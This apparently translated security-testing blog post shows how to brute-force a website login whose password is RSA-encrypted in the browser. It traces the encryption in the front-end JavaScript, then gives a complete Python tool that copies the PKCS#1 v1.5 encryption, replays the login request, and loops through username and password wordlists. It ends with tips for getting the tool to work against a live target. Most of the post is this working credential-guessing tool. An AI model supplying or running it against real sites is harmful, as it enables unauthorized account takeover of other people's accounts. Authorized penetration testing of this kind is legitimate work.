During a security test of a website we found that the login password is encrypted client-side, and that the ciphertext sent for the same password is different on every login. Replaying the login request with Burp showed no lockout or rate limiting, so the login can be brute-forced. But because the password is encrypted before it leaves the browser, Burp Intruder cannot simply feed a wordlist into the request, so I wrote a brute-force script in Python.
While replaying the login request with Burp, several parameters could be removed without changing the response. So all that brute-forcing needs is to work out how the password is encrypted and reproduce that encryption in the script. The length of the ciphertext, and the fact that the same password encrypts to something different every time, point to asymmetric encryption with randomized padding; a bold guess is RSA.
A quick analysis of the front-end JS with Chrome DevTools
1. When the Login button is clicked, the password is replaced by a much longer string (the ciphertext) and then the login request is sent, so the encryption happens in the click handler of the Login button.
2. In the Event Listeners tab on the right, find the function bound to the button's click event and the JS file it lives in.
3. Search that file for the click-event function.
4. Find the RSA public key and the JS library it depends on.
There are two ways to simulate the login:
1. Extract all the JS files the encryption needs, drive that JS from Python to perform the encryption, pull out the encrypted string and log in from Python. In this case, however, the JS code base was large, driving it from Python was error-prone (I did not get it working) and slow, so I used the second method instead.
2. Do the RSA encryption in Python and then simulate the login. The script in this post takes this approach to brute-force the login.
u.txt is the username dictionary and p.txt is the password dictionary.
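As an added example (not the post's own script), here is a stand-alone version of the second approach in Python using only the standard library. It assumes the front-end library does PKCS#1 v1.5 RSA encryption followed by base64 (what jsencrypt-style libraries do), that the modulus and exponent have been copied out of the site's JS as hex integers, and that the login URL, form-field names and success marker in `http_login` are placeholders to be replaced with whatever Burp captured. The demo key pair and the fake server are constructed inline so the script runs offline; a real target's `n` and `e` replace them.

```python
"""Brute-force an RSA-encrypted login by reproducing the front-end encryption.

Added example, not the original post's script. Assumptions (not from the page):
  * the front end does PKCS#1 v1.5 (type 2) RSA encryption and base64-encodes it;
  * n and e were copied from the site's JS; the demo key below is constructed;
  * the URL, field names and success marker in http_login are placeholders.
"""
import base64
import os
import random
import urllib.parse
import urllib.request

# ---------- RSA with PKCS#1 v1.5 padding (stdlib only) ----------

def pkcs1_v15_pad(message: bytes, k: int) -> bytes:
    """EME-PKCS1-v1_5: 00 02 <non-zero random PS> 00 <message>, k bytes total.
    The random PS is why the same password produces a new ciphertext each time."""
    if len(message) > k - 11:
        raise ValueError("message too long for key size")
    ps = bytearray()
    while len(ps) < k - len(message) - 3:
        b = os.urandom(1)[0]
        if b != 0:              # padding bytes must be non-zero
            ps.append(b)
    return b"\x00\x02" + bytes(ps) + b"\x00" + message

def rsa_encrypt(message: bytes, n: int, e: int) -> str:
    """Encrypt like the front end: pad, m^e mod n, base64 of the k-byte result."""
    k = (n.bit_length() + 7) // 8
    c = pow(int.from_bytes(pkcs1_v15_pad(message, k), "big"), e, n)
    return base64.b64encode(c.to_bytes(k, "big")).decode()

def rsa_decrypt(ciphertext_b64: str, n: int, d: int) -> bytes:
    """Only needed to simulate the server side in the offline demo."""
    k = (n.bit_length() + 7) // 8
    c = int.from_bytes(base64.b64decode(ciphertext_b64), "big")
    em = pow(c, d, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    return em[em.index(b"\x00", 2) + 1:]

# ---------- constructed demo key (a real target's n, e come from its JS) ----------

def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin; good enough for generating a throwaway demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def generate_demo_key(bits: int = 512):
    """Return (n, e, d). 512 bits keeps the demo fast; it is not a real key."""
    e, half = 65537, bits // 2
    while True:
        p = random.getrandbits(half) | (1 << (half - 1)) | 1
        q = random.getrandbits(half) | (1 << (half - 1)) | 1
        if p != q and is_probable_prime(p) and is_probable_prime(q):
            return p * q, e, pow(e, -1, (p - 1) * (q - 1))

# ---------- login replay and brute force ----------

def http_login(url: str, user: str, enc_pw: str) -> bool:
    """Replay the captured request. URL, field names and the success marker
    are assumptions: replace them with what Burp shows for the target."""
    data = urllib.parse.urlencode({"username": user, "password": enc_pw}).encode()
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        body = resp.read().decode(errors="replace")
    return '"success":true' in body      # placeholder success check

def make_fake_server(n: int, d: int, valid: dict):
    """Offline stand-in for the target: decrypts and checks the credentials."""
    def login(user: str, enc_pw: str) -> bool:
        return valid.get(user) == rsa_decrypt(enc_pw, n, d).decode(errors="replace")
    return login

def load_wordlist(path: str) -> list:
    """Read u.txt / p.txt style dictionaries, one entry per line."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return [line.rstrip("\r\n") for line in f if line.strip()]

def brute_force(usernames, passwords, n: int, e: int, login):
    """Encrypt each candidate exactly as the front end would and submit it.
    `login(user, enc_pw)` returns True on success. Returns (user, pw) or None."""
    for user in usernames:
        for pw in passwords:
            if login(user, rsa_encrypt(pw.encode(), n, e)):
                return user, pw
    return None

if __name__ == "__main__":
    n, e, d = generate_demo_key()
    server = make_fake_server(n, d, {"admin": "Passw0rd!"})   # constructed target
    users = ["root", "admin"]                       # would be load_wordlist("u.txt")
    pws = ["123456", "password", "Passw0rd!"]       # would be load_wordlist("p.txt")
    print(brute_force(users, pws, n, e, server))    # ('admin', 'Passw0rd!')
```

Before running this against a real target, encrypt a known password once and compare the shape of the result with a ciphertext captured in Burp: base64 length must match the key size (88 characters for a 512-bit key, 172 for 1024-bit, 344 for 2048-bit) and the server must accept it. If the site's library uses a different padding (OAEP, or a non-standard scheme), the server will reject every candidate and the padding function is the first thing to revisit. If the key is embedded as a PEM string rather than as hex n and e, a library such as `cryptography` can load it and expose `public_numbers().n` and `.e`.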
This example is not general-purpose and is only a small amount of code, but it can serve as a reference for brute-forcing RSA-encrypted logins. In some environments both the encryption and the login flow are more complex than this; the key is always to analyse the front-end JS.